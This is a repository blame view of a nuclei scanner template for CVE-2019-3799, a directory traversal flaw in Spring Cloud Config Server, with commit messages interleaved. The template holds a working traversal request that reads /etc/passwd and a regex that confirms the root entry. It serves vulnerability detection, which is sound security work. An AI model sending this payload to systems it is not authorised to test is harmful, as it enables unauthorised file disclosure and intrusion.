daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-3799.yaml

25 lines
944 B
YAML
Raw Normal View History

misc changes
2021-01-02 04:59:06 +00:00
id: CVE-2019-3799
Pushing newly added cves
2020-06-22 13:35:37 +00:00
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
Description and referenes
2021-03-30 12:10:17 +00:00
description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
reference: |
- https://github.com/mpgn/CVE-2019-3799
- https://pivotal.io/security/cve-2019-3799
tag improvements
2021-03-18 07:54:36 +00:00
tags: cve,cve2019,lfi
Pushing newly added cves
2020-06-22 13:35:37 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
Fixed default condition OR to AND in false-positives
2020-07-08 11:38:57 +00:00
matchers-condition: and
Pushing newly added cves
2020-06-22 13:35:37 +00:00
matchers:
- type: status
status:
Update CVE-2019-3799.yaml
2020-06-22 21:52:51 +00:00
- 200
Pushing newly added cves
2020-06-22 13:35:37 +00:00
- type: regex
regex:
Update CVE-2019-3799.yaml
2020-06-22 21:52:51 +00:00
- 'root:[x*]:0:0:'
Pushing newly added cves
2020-06-22 13:35:37 +00:00
part: body